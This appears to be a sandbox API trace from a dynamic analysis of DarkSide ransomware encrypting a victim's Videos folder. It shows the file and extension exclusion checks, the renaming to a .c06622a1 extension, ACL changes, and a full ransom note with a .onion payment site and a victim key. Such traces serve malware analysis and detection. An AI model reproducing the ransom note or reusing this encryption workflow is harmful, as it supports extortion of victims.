[0168.443] wcslen (_String="msc") returned 0x3 [0168.443] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0168.443] wcslen (_String="msp") returned 0x3 [0168.443] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0168.443] wcslen (_String="msstyles") returned 0x8 [0168.443] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0168.443] wcslen (_String="msu") returned 0x3 [0168.443] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0168.443] wcslen (_String="nls") returned 0x3 [0168.443] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0168.443] wcslen (_String="nomedia") returned 0x7 [0168.443] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0168.443] wcslen (_String="ocx") returned 0x3 [0168.443] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0168.443] wcslen (_String="prf") returned 0x3 [0168.444] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0168.444] wcslen (_String="ps1") returned 0x3 [0168.444] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0168.444] wcslen (_String="rom") returned 0x3 [0168.444] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0168.444] wcslen (_String="rtp") returned 0x3 [0168.444] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0168.444] wcslen (_String="scr") returned 0x3 [0168.444] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0168.444] wcslen (_String="shs") returned 0x3 [0168.444] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0168.444] wcslen (_String="spl") returned 0x3 [0168.444] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0168.444] wcslen (_String="sys") returned 0x3 [0168.444] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0168.444] wcslen (_String="theme") returned 0x5 [0168.444] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0168.444] wcslen (_String="themepack") returned 0x9 [0168.444] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0168.444] wcslen (_String="wpx") returned 0x3 [0168.444] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0168.445] wcslen (_String="lock") returned 0x4 [0168.445] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0168.445] wcslen (_String="key") returned 0x3 [0168.445] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0168.445] wcslen (_String="hta") returned 0x3 [0168.445] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0168.445] wcslen (_String="msi") returned 0x3 [0168.445] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0168.445] wcslen (_String="pdb") returned 0x3 [0168.445] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0168.445] wcslen (_String="sqlite") returned 0x6 [0168.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.445] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.445] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.445] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.445] wcscpy (in: _Dest=0x321009a, _Source="PAuWBm2A.avi" | out: _Dest="PAuWBm2A.avi") returned="PAuWBm2A.avi" [0168.445] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi", dwFileAttributes=0x80) returned 1 [0168.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pauwbm2a.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0168.446] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.446] ReadFile (in: hFile=0x1dc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.447] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x903bf16c [0168.447] RtlComputeCrc32 (PartialCrc=0xf16c, Buffer=0x32ec24, Length=0x80) returned 0x4b093e2e [0168.447] RtlComputeCrc32 (PartialCrc=0x3e2e, Buffer=0x32ec24, Length=0x80) returned 0xf27b40b5 [0168.447] RtlComputeCrc32 (PartialCrc=0x40b5, Buffer=0x32ec24, Length=0x80) returned 0xe15d5511 [0168.447] RtlComputeCrc32 (PartialCrc=0x5511, Buffer=0x32ec24, Length=0x80) returned 0x2348f716 [0168.447] CloseHandle (hObject=0x1dc) returned 1 [0168.447] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.447] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi" [0168.447] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi") returned 0x35 [0168.447] wcscpy (in: _Dest=0x32200ba, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.447] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pauwbm2a.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pauwbm2a.avi.c06622a1"), dwFlags=0x8) returned 1 [0168.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PAuWBm2A.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pauwbm2a.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0168.450] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.450] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3c20020 [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58ac9521 [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x443f9ed0 [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x94e77f9 [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x587b9040 [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a7fb11a [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d8a4c1d [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2531d9bb [0168.459] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x696db05c [0168.462] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3c20094, Length=0x80) returned 0xac074bd7 [0168.462] RtlComputeCrc32 (PartialCrc=0x4bd7, Buffer=0x3c20094, Length=0x80) returned 0x154f5949 [0168.462] RtlComputeCrc32 (PartialCrc=0x5949, Buffer=0x3c20094, Length=0x80) returned 0x8605dfe9 [0168.462] RtlComputeCrc32 (PartialCrc=0xdfe9, Buffer=0x3c20094, Length=0x80) returned 0x8da124ae [0168.462] RtlComputeCrc32 (PartialCrc=0x24ae, Buffer=0x3c20094, Length=0x80) returned 0x5081b440 [0168.462] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c20020) returned 1 [0168.462] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.463] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.465] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91eac6a0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91eac6a0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91eac6a0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0168.465] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0168.465] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06e3700, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0xb9207010, ftLastAccessTime.dwHighDateTime=0x1d5e34f, ftLastWriteTime.dwLowDateTime=0xb9207010, ftLastWriteTime.dwHighDateTime=0x1d5e34f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWQjmzX2VptJG", cAlternateFileName="SWQJMZ~1")) returned 1 [0168.465] _wcsicmp (_Str1="$recycle.bin", _Str2="SWQjmzX2VptJG") returned -79 [0168.465] wcslen (_String="$recycle.bin") returned 0xc [0168.465] _wcsicmp (_Str1="config.msi", _Str2="SWQjmzX2VptJG") returned -16 [0168.465] wcslen (_String="config.msi") returned 0xa [0168.465] _wcsicmp (_Str1="$windows.~bt", _Str2="SWQjmzX2VptJG") returned -79 [0168.465] wcslen (_String="$windows.~bt") returned 0xc [0168.465] _wcsicmp (_Str1="$windows.~ws", _Str2="SWQjmzX2VptJG") returned -79 [0168.465] wcslen (_String="$windows.~ws") returned 0xc [0168.465] _wcsicmp (_Str1="windows", _Str2="SWQjmzX2VptJG") returned 4 [0168.465] wcslen (_String="windows") returned 0x7 [0168.465] _wcsicmp (_Str1="appdata", _Str2="SWQjmzX2VptJG") returned -18 [0168.465] wcslen (_String="appdata") returned 0x7 [0168.465] _wcsicmp (_Str1="application data", _Str2="SWQjmzX2VptJG") returned -18 [0168.465] wcslen (_String="application data") returned 0x10 [0168.465] _wcsicmp (_Str1="boot", _Str2="SWQjmzX2VptJG") returned -17 [0168.465] wcslen (_String="boot") returned 0x4 [0168.465] _wcsicmp (_Str1="google", _Str2="SWQjmzX2VptJG") returned -12 [0168.465] wcslen (_String="google") returned 0x6 [0168.465] _wcsicmp (_Str1="mozilla", _Str2="SWQjmzX2VptJG") returned -6 [0168.465] wcslen (_String="mozilla") returned 0x7 [0168.466] _wcsicmp (_Str1="program files", _Str2="SWQjmzX2VptJG") returned -3 [0168.466] wcslen (_String="program files") returned 0xd [0168.466] _wcsicmp (_Str1="program files (x86)", _Str2="SWQjmzX2VptJG") returned -3 [0168.466] wcslen (_String="program files (x86)") returned 0x13 [0168.466] _wcsicmp (_Str1="programdata", _Str2="SWQjmzX2VptJG") returned -3 [0168.466] wcslen (_String="programdata") returned 0xb [0168.466] _wcsicmp (_Str1="system volume information", _Str2="SWQjmzX2VptJG") returned 2 [0168.466] wcslen (_String="system volume information") returned 0x19 [0168.466] _wcsicmp (_Str1="tor browser", _Str2="SWQjmzX2VptJG") returned 1 [0168.466] wcslen (_String="tor browser") returned 0xb [0168.466] _wcsicmp (_Str1="windows.old", _Str2="SWQjmzX2VptJG") returned 4 [0168.466] wcslen (_String="windows.old") returned 0xb [0168.466] _wcsicmp (_Str1="intel", _Str2="SWQjmzX2VptJG") returned -10 [0168.466] wcslen (_String="intel") returned 0x5 [0168.466] _wcsicmp (_Str1="msocache", _Str2="SWQjmzX2VptJG") returned -6 [0168.466] wcslen (_String="msocache") returned 0x8 [0168.466] _wcsicmp (_Str1="perflogs", _Str2="SWQjmzX2VptJG") returned -3 [0168.466] wcslen (_String="perflogs") returned 0x8 [0168.466] _wcsicmp (_Str1="x64dbg", _Str2="SWQjmzX2VptJG") returned 5 [0168.466] wcslen (_String="x64dbg") returned 0x6 [0168.466] _wcsicmp (_Str1="public", _Str2="SWQjmzX2VptJG") returned -3 [0168.466] wcslen (_String="public") returned 0x6 [0168.466] _wcsicmp (_Str1="all users", _Str2="SWQjmzX2VptJG") returned -18 [0168.466] wcslen (_String="all users") returned 0x9 [0168.466] _wcsicmp (_Str1="default", _Str2="SWQjmzX2VptJG") returned -15 [0168.466] wcslen (_String="default") returned 0x7 [0168.466] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0168.467] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 0x2a [0168.467] wcscpy (in: _Dest=0x1f8e6a, _Source="SWQjmzX2VptJG" | out: _Dest="SWQjmzX2VptJG") returned="SWQjmzX2VptJG" [0168.467] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.467] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.467] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.467] GetNamedSecurityInfoW () returned 0x0 [0168.468] SetEntriesInAclW () returned 0x0 [0168.468] SetNamedSecurityInfoW () returned 0x0 [0168.475] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c6a8) returned 1 [0168.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.475] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 1 [0168.475] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0168.475] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0168.475] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0168.476] CloseHandle (hObject=0x1bc) returned 1 [0168.477] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0168.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.477] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\") returned="" [0168.477] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\") returned 0x37 [0168.477] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0168.477] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06e3700, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x921f24e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x921f24e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.478] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7a9f10, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0x5ffdf4f0, ftLastAccessTime.dwHighDateTime=0x1d5dd62, ftLastWriteTime.dwLowDateTime=0x5ffdf4f0, ftLastWriteTime.dwHighDateTime=0x1d5dd62, nFileSizeHigh=0x0, nFileSizeLow=0x4ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="6rmODmx20qDNcI94tlWL.avi", cAlternateFileName="6RMODM~1.AVI")) returned 1 [0168.478] _wcsicmp (_Str1="6rmODmx20qDNcI94tlWL.avi", _Str2="README.c06622a1.TXT") returned -60 [0168.478] wcsstr (_Str="6rmODmx20qDNcI94tlWL.avi", _SubStr="README") returned 0x0 [0168.478] _wcsicmp (_Str1="autorun.inf", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 43 [0168.478] wcslen (_String="autorun.inf") returned 0xb [0168.478] _wcsicmp (_Str1="boot.ini", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 44 [0168.478] wcslen (_String="boot.ini") returned 0x8 [0168.478] _wcsicmp (_Str1="bootfont.bin", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 44 [0168.479] wcslen (_String="bootfont.bin") returned 0xc [0168.479] _wcsicmp (_Str1="bootsect.bak", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 44 [0168.479] wcslen (_String="bootsect.bak") returned 0xc [0168.479] _wcsicmp (_Str1="desktop.ini", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 46 [0168.479] wcslen (_String="desktop.ini") returned 0xb [0168.479] _wcsicmp (_Str1="iconcache.db", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 51 [0168.479] wcslen (_String="iconcache.db") returned 0xc [0168.479] _wcsicmp (_Str1="ntldr", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 56 [0168.479] wcslen (_String="ntldr") returned 0x5 [0168.479] _wcsicmp (_Str1="ntuser.dat", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 56 [0168.479] wcslen (_String="ntuser.dat") returned 0xa [0168.479] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 56 [0168.479] wcslen (_String="ntuser.dat.log") returned 0xe [0168.479] _wcsicmp (_Str1="ntuser.ini", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 56 [0168.479] wcslen (_String="ntuser.ini") returned 0xa [0168.479] _wcsicmp (_Str1="thumbs.db", _Str2="6rmODmx20qDNcI94tlWL.avi") returned 62 [0168.479] wcslen (_String="thumbs.db") returned 0x9 [0168.480] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0168.480] wcslen (_String="386") returned 0x3 [0168.480] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0168.480] wcslen (_String="adv") returned 0x3 [0168.480] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0168.480] wcslen (_String="ani") returned 0x3 [0168.480] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0168.480] wcslen (_String="bat") returned 0x3 [0168.480] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0168.480] wcslen (_String="bin") returned 0x3 [0168.480] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0168.480] wcslen (_String="cab") returned 0x3 [0168.480] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0168.480] wcslen (_String="cmd") returned 0x3 [0168.480] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0168.480] wcslen (_String="com") returned 0x3 [0168.481] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0168.481] wcslen (_String="cpl") returned 0x3 [0168.481] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0168.481] wcslen (_String="cur") returned 0x3 [0168.481] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0168.481] wcslen (_String="deskthemepack") returned 0xd [0168.481] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0168.481] wcslen (_String="diagcab") returned 0x7 [0168.481] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0168.481] wcslen (_String="diagcfg") returned 0x7 [0168.481] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0168.481] wcslen (_String="diagpkg") returned 0x7 [0168.481] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0168.481] wcslen (_String="dll") returned 0x3 [0168.481] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0168.481] wcslen (_String="drv") returned 0x3 [0168.481] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0168.481] wcslen (_String="exe") returned 0x3 [0168.481] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0168.481] wcslen (_String="hlp") returned 0x3 [0168.481] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0168.482] wcslen (_String="icl") returned 0x3 [0168.482] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0168.482] wcslen (_String="icns") returned 0x4 [0168.482] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0168.482] wcslen (_String="ico") returned 0x3 [0168.482] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0168.482] wcslen (_String="ics") returned 0x3 [0168.482] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0168.482] wcslen (_String="idx") returned 0x3 [0168.482] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0168.482] wcslen (_String="ldf") returned 0x3 [0168.482] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0168.482] wcslen (_String="lnk") returned 0x3 [0168.482] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0168.482] wcslen (_String="mod") returned 0x3 [0168.482] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0168.482] wcslen (_String="mpa") returned 0x3 [0168.482] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0168.482] wcslen (_String="msc") returned 0x3 [0168.482] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0168.482] wcslen (_String="msp") returned 0x3 [0168.483] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0168.483] wcslen (_String="msstyles") returned 0x8 [0168.483] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0168.483] wcslen (_String="msu") returned 0x3 [0168.483] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0168.483] wcslen (_String="nls") returned 0x3 [0168.483] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0168.483] wcslen (_String="nomedia") returned 0x7 [0168.483] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0168.483] wcslen (_String="ocx") returned 0x3 [0168.483] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0168.483] wcslen (_String="prf") returned 0x3 [0168.483] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0168.483] wcslen (_String="ps1") returned 0x3 [0168.483] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0168.483] wcslen (_String="rom") returned 0x3 [0168.483] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0168.483] wcslen (_String="rtp") returned 0x3 [0168.483] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0168.483] wcslen (_String="scr") returned 0x3 [0168.483] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0168.484] wcslen (_String="shs") returned 0x3 [0168.484] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0168.484] wcslen (_String="spl") returned 0x3 [0168.484] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0168.484] wcslen (_String="sys") returned 0x3 [0168.484] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0168.484] wcslen (_String="theme") returned 0x5 [0168.484] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0168.484] wcslen (_String="themepack") returned 0x9 [0168.484] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0168.484] wcslen (_String="wpx") returned 0x3 [0168.484] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0168.484] wcslen (_String="lock") returned 0x4 [0168.484] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0168.484] wcslen (_String="key") returned 0x3 [0168.484] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0168.484] wcslen (_String="hta") returned 0x3 [0168.484] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0168.484] wcslen (_String="msi") returned 0x3 [0168.484] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0168.485] wcslen (_String="pdb") returned 0x3 [0168.485] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0168.485] wcslen (_String="sqlite") returned 0x6 [0168.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: 